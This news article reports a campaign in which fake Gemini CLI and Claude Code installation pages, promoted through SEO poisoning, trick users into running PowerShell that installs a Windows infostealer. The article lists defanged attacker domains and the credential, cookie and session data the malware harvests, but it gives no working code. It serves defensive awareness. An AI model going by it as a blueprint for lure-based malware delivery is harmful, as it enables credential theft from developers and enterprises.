Fake Google Gemini and Claude Code Pages Used to Deliver Windows Infostealer Malware in Global SEO Poisoning Campaign

Listen to this Post

Featured Image

Introduction

A new wave of cyberattacks is abusing the popularity of AI development tools to trick developers and enterprise users into installing information-stealing malware. Security researchers at EclecticIQ have identified a coordinated campaign where attackers created fake websites impersonating Google Gemini’s CLI tool and Anthropic’s Claude Code. These fake portals are being pushed through search engine manipulation techniques and are designed to look like legitimate installation pages. Once users follow the instructions, they unknowingly execute malicious PowerShell commands that install a stealthy infostealer targeting Windows systems.

Summary of the Original Investigation

Security researchers at EclecticIQ discovered a malicious campaign in which threat actors built counterfeit websites mimicking Google Gemini’s coding interface and Anthropic’s Claude Code environment. The discovery was initially highlighted by independent researcher @g0njxa on X, who reported impersonation activity targeting Gemini CLI users. EclecticIQ confirmed that the campaign began as early as March 2026, with attackers registering multiple suspicious domains designed to resemble official AI developer tools.

The infrastructure used in the attack suggests a targeted focus on users in the United States and the United Kingdom, based on domain choices such as .co.uk, .us.com, and .us.org. To increase visibility, attackers used SEO poisoning techniques to push malicious pages above legitimate results in search engines. Victims searching for installation guides are redirected to fake pages that closely imitate official documentation for AI tools.

Once a victim lands on the fake site, they are presented with instructions that appear legitimate. These instructions typically include copying a PowerShell command into the Windows terminal. When executed, the command connects to attacker-controlled servers and downloads an infostealer payload. This malware runs entirely in memory, making detection more difficult, and begins harvesting sensitive data from the infected system.

The malware focuses heavily on enterprise environments and developer workstations. It extracts credentials, cookies, autofill data, and session information from major browsers including Chrome, Edge, Brave, and Firefox. Beyond browsers, it also targets collaboration tools widely used in corporate environments such as Slack, Microsoft Teams, Discord, Mattermost, Zoom, Telegram Desktop, Notion, Zoho Mail Desktop, and LiveChat.

In addition to communication platforms, the malware collects data from VPN clients, cloud storage services, cryptocurrency wallets, and local system files. It also gathers configuration data and metadata that can help attackers map the victim’s environment. In some cases, the malware enables remote code execution, allowing attackers to interact directly with compromised systems.

Two separate attack chains were identified. One impersonates Gemini CLI using domains like geminicli[.]co[.]com and gemini-setup[.]com, while the other impersonates Claude Code using claudecode[.]co[.]com and claude-setup[.]com. Both campaigns use similar infrastructure, payload delivery methods, and data exfiltration servers, strongly suggesting a single threat actor is behind both operations.

What Undercode Say:

The campaign reflects a broader evolution in cybercrime where attackers are no longer relying on purely technical exploits. Instead, they are weaponizing trust, branding, and user behavior. By impersonating well known AI developer tools like Gemini CLI and Claude Code, attackers exploit the growing dependence of developers on AI-assisted workflows.

SEO poisoning is a key part of this strategy. Rather than hacking systems directly, attackers manipulate search rankings so that malicious pages appear more trustworthy than official documentation. This shifts the attack surface from code vulnerabilities to human decision making, which is often the weakest link in security chains.

The use of PowerShell as a delivery mechanism is particularly significant. PowerShell is a legitimate Windows administration tool, meaning its activity often blends into normal enterprise behavior. Running malware entirely in memory further reduces forensic traces, making detection harder for traditional antivirus systems.

The infostealer’s design shows a strong focus on enterprise compromise rather than individual users. By targeting Slack, Teams, Zoom, and Notion, attackers gain access not just to credentials but to entire corporate communication environments. This opens the door to lateral movement within organizations.

The inclusion of cloud storage platforms and VPN configurations suggests an intent to escalate privileges and expand access beyond a single machine. Once attackers gain session cookies or authentication tokens, they can bypass login protections without triggering multi factor authentication in some cases.

The dual impersonation of Gemini CLI and Claude Code indicates operational scaling. Instead of a single fake brand, attackers replicate multiple trusted ecosystems to increase victim reach. This also reduces dependency on one compromised identity flow.

Shared infrastructure between both campaigns suggests centralized control rather than isolated attackers. This increases the likelihood of a financially motivated group with established malware distribution capabilities.

The memory resident nature of the infostealer reduces persistence artifacts. This means that once a system is rebooted or cleaned, traditional recovery becomes difficult without network-level detection logs.

Another concerning aspect is the use of encrypted exfiltration channels. This prevents security teams from easily identifying stolen data patterns in transit, delaying incident response.

The targeting of developers is strategically important. Developers often have access to source code repositories, CI/CD pipelines, and production credentials, making them high-value targets for downstream supply chain attacks.

If successful, such campaigns could enable attackers to pivot from individual endpoints into broader enterprise infrastructure, potentially compromising entire organizations through a single infected workstation.

Overall, this campaign shows a convergence of social engineering, search engine manipulation, and advanced malware engineering, making it a highly efficient and scalable attack model.

Fact Checker Results

✔ The campaign is consistent with known SEO poisoning and infostealer distribution techniques used in modern cybercrime.
✔ PowerShell-based memory injection and credential harvesting are established methods used by Windows-targeting malware families.
✔ Claims about impersonation of AI developer tools align with observed trends in phishing against developer ecosystems.

Prediction

Cybercriminal groups will continue targeting AI development tools as they become more integrated into daily workflows.
SEO poisoning attacks will likely increase as a primary infection vector due to their low cost and high reach.
Infostealers will evolve further toward cloud session hijacking and multi-platform credential theft.

🕵️‍📝Let’s dive deep and fact‑check.

References:

Reported By: www.infosecurity-magazine.com
Extra Source Hub (Possible Sources for article):
https://www.digitaltrends.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2
Bing

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeNews & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube